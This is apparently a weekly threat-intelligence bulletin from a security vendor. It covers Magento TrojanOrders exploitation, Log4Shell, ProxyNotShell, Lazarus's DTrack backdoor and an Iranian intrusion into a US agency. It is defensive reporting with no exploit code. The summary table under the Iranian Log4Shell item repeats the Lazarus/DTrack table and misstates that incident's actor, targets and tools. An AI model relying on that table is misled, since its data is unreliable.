Our reporting this week reaffirms cybercriminals’ tendency to capitalise on seasonal events. At least seven cybercriminal groups are responsible for a surge in TrojanOrders compromises of e-commerce websites using Magento software, with the number of compromises in November totalling more than the previous 10 months combined. TrojanOrders refers to the exploitation of the critical vulnerability, tracked as CVE-2022-24086 (CVSS: 9.8|OVSS: 71), affecting the checkout process of sites using the e-commerce software Magento. Cybercriminals exploit the vulnerability by creating an account on the target website and placing an order that contains malicious code in the template fields.

This incident reaffirms cybercriminals’ tendency to capitalise on seasonal events, as the increase in compromises coincides with the guaranteed surge in online retail during the upcoming Black Friday and Cyber Monday sales. Additionally, the increase can also be attributed to the sale of Proof-of-Concept exploits for CVE-2022-24086 on cybercriminal forums. We anticipate that TrojanOrders compromises will continue as online retail activity is expected to remain high in the weeks up until Christmas.

Jump to key reports from the last week:

Key Vulnerabilities

1. CVE-2022-24086
An Adobe Commerce and Magento Open Source improper input validation vulnerability (CVSS: 9.8|OVSS: 71) affecting Adobe Commerce and Magento Open Source versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier). Although security updates were released in February 2022, the vulnerability has been exploited in the wild in campaigns targeting Adobe Commerce merchants. Exploitation of this issue does not require user interaction and enables unauthenticated adversaries to execute arbitrary code and inject malware on unpatched websites.

2. CVE-2021-44228
A critical vulnerability tracked as Log4Shell (CVSS: 10|OVS: 100) affecting Apache Log4j Java-based logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint. Although a patch was released in December 2021, some organisations have been slow to apply it which is why it has become an extremely attractive exploit for malicious actors, including threat actors from North Korea, China and most recently Iran.

3. CVE-2022-41082 & CVE-2022-41040
Two high-severity vulnerabilities in Microsoft Exchange Server 2013, 2016, and 2019, collectively known as ProxyNotShell. The vulnerabilities are tracked as CVE-2022-41040 (CVSS: 8.8| OVSS: 92), which is a server-side request forgery vulnerability, while CVE-2022-41082 (CVSS: 8.8| OVSS: 92) enables remote code execution access to PowerShell dependent on adversary access. In October 2022, researchers warned that mitigations for vulnerabilities were insufficient and could be bypassed by threat actors, which led to Microsoft releasing new ProxyNotShell security updates as part of their November 2022 Patch. On 17 November, a Proof-of-Concept exploit code was released confirming how attackers have exploited the Exchange servers.

Key Intelligence Reports

1. Lazarus Group targets multiple countries with DTrack malware (OVSS 86)

The North Korean state-sponsored threat actor Lazarus Group is targeting victims across multiple regions including Europe, Asia and South America with the DTrack backdoor, a tool first discovered in 2019. The group are deploying the malware to compromise victims in numerous sectors including chemical manufacturing, governmental research centres, IT service providers, policy institutes and education.

DTrack’s features include keylogging, screen capture and gathering system information. These core features remain, however, changes to the decryption process and the way the payload is executed are the notable modifications to the malware. Lazarus Group gains access to victims’ environments through the use of stolen credentials or exploiting internet-exposed services. Once inside the network, DTrack begins to unpack the malware in several stages, the first of which requires the payload to be retrieved from a file that imitates a legitimate NVIDIA executable named NvContainer.exe. The second and third stages involve the decryption of portable executable files that have been encrypted using modified versions of RC4, RC5 and RC6 algorithms. The final payload is a Dynamic Link Library (DLL) that is loaded using process hollowing into explorer.exe, the Windows File Explorer feature. Specific libraries are loaded using API hashing rather than obfuscated strings observed in previous campaigns.

CategoryResult
Threat SubcategoryState-sponsored, North Korea
Threat ActorLazarus Group
SectorsEducation, Government, Manufacturing, Telecommunications
ObjectivePayment card data/financial data theft
Countries & TargetBrazil, Germany, India, Italy, Mexico, North Korea, Saudi Arabia, Switzerland, Turkey, United States of America
Malware & ToolsDTrack
Infection VectorsCredential compromise
Sourceshttps://securelist.com/dtrack-targeting-europe-latin-america/107798/

2. Cybercriminals increasingly compromise Magento e-commerce websites in TrojanOrders attacks (OVSS 61)

At least seven cybercriminal groups are responsible for a surge in TrojanOrders compromises of e-commerce websites using Magento software, with the number of compromises in November totalling more than the previous 10 months combined. TrojanOrders refers to the exploitation of the critical vulnerability, tracked as CVE-2022-24086 (CVSS: 9.8|OVSS: 71), affecting the checkout process of sites using the e-commerce software Magento. If exploited, unauthenticated adversaries can execute arbitrary code and inject malware on unpatched websites. Cybercriminals exploit the vulnerability by creating an account on the target website and placing an order that contains malicious code in the template fields. We have previously reported that cybercriminals are exploiting CVE-2022-24086 to install Remote Access Trojans (RATs) and steal personal information and payment card data.

Researchers have noted a significant increase in November 2022 of active scanning for the legitimate file “health_check.php”, where cybercriminals commonly hide RATs, to determine if the site has already been infected. If so, cybercriminals have been observed replacing the existing RAT with their own, indicating that some e-commerce sites are being compromised multiple times by different cybercriminal groups. We have previously reported on a cybercriminal group known as Water Labbu injecting a malicious JavaScript payload into at least 45 fraudulent cryptocurrency websites operated by other cybercriminals, further demonstrating that cybercriminals hijack other operations to reduce the time and effort required to launch a campaign.

This incident reaffirms cybercriminals’ tendency to capitalise on seasonal events, as the increase in compromises coincides with the guaranteed surge in online retail during the upcoming Black Friday and Cyber Monday sales in November. Additionally, the increase can also be attributed to the sale of Proof-of-Concept exploits for CVE-2022-24086 on cybercriminal forums. We anticipate that this rate of TrojanOrders attacks will continue as online retail activity is expected to remain high in the weeks up until Christmas.

CategoryResult
Threat SubcategoryPII Theft
SectorsRetail
ObjectivePayment card data/financial data theft
Target SystemE-commerce Platform
Target SoftwareMagneto
CVECVE-2022-24086
Infection VectorsStrategic web compromise
Sourceshttps://sansec.io/research/trojanorder-magento

3. Iranian state-sponsored threat group compromise a US Federal Civilian Executive Branch agency (OVSS 61)

On 16 November 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint advisory warning that an Iranian state-sponsored threat actor had exploited CVE-2021-44228 (CVSS: 10|OVS: 100), a critical vulnerability tracked as Log4Shell affecting the ubiquitous Log4j Java-based logging library. CISA revealed that an unnamed Iranian nation-state unit had gained initial access Federal Civilian Executive Branch (FCEB) agency’s network by exploiting the critical Log4Shell vulnerability in an unpatched VMware Horizon server after an investigation observed suspected malicious activity on the network between mid-June and mid-July 2022.

After exploiting the vulnerability to gain access to the target network, the perpetrators installed the XMRig cryptocurrency miner and compromised credentials. It then proceeded to move laterally on the system and implanted Ngrok reverse proxies to create an encrypted TCP tunnel, granting the threat actors remote access into the network to maintain persistence. Although a patch for CVE-2021-44228 was released in December 2021, some organisations have been slow to apply it which is why it has become an extremely attractive exploit for malicious actors. We have previously reported on threat actors from North Korea and China using this tool in addition to Iran. In their statement, CISA and the FBI warn that all organisations who have yet to apply the patch should assume they have been compromised and begin threat-hunting activities.

The statement did not disclose the name of the Iranian group, however, multiple Iranian nation-state units have been observed exploiting Log4Shell in the past. We have previously reported that the Iranian state-sponsored group MuddyWater (also known as MERCURY) exploited two Log4Shell vulnerabilities in August 2022 to compromise Israeli organisations, and APT35 (also known as Charming Kitten and Phosphorous) was also observed exploiting the same vulnerabilities back in 2021. Based on the tools and target of this incident, it is likely the threat actors in this case are connected to one of these groups. This example also reaffirms the necessity of swiftly applying patches to critical vulnerabilities as they become available, as threat actors are routinely scanning for them in order to exploit them.

CategoryResult
Threat SubcategoryState-sponsored, North Korea
Threat ActorLazarus Group
SectorsEducation, Government, Manufacturing, Telecommunications
ObjectivePayment card data/financial data theft
Countries & TargetBrazil, Germany, India, Italy, Mexico, North Korea, Saudi Arabia, Switzerland, Turkey, United States of America
Malware & ToolsDTrack
Infection VectorsCredential compromise
Sourceshttps://securelist.com/dtrack-targeting-europe-latin-america/107798/

If you come across any issues or need assistance, please do not hesitate to reach out to Secrutiny. 

What is OVSS?

The Orpheus Vulnerability Severity Score (OVSS) helps companies understand the risk associated with particular vulnerabilities. Orpheus does this by adding additional context on the likely threat to and impact of CVEs, building upon the vulnerability information that is provided as part of the CVSS (Common Vulnerabilities Scoring System) score.

The Orpheus Vulnerability Severity Score (OVSS)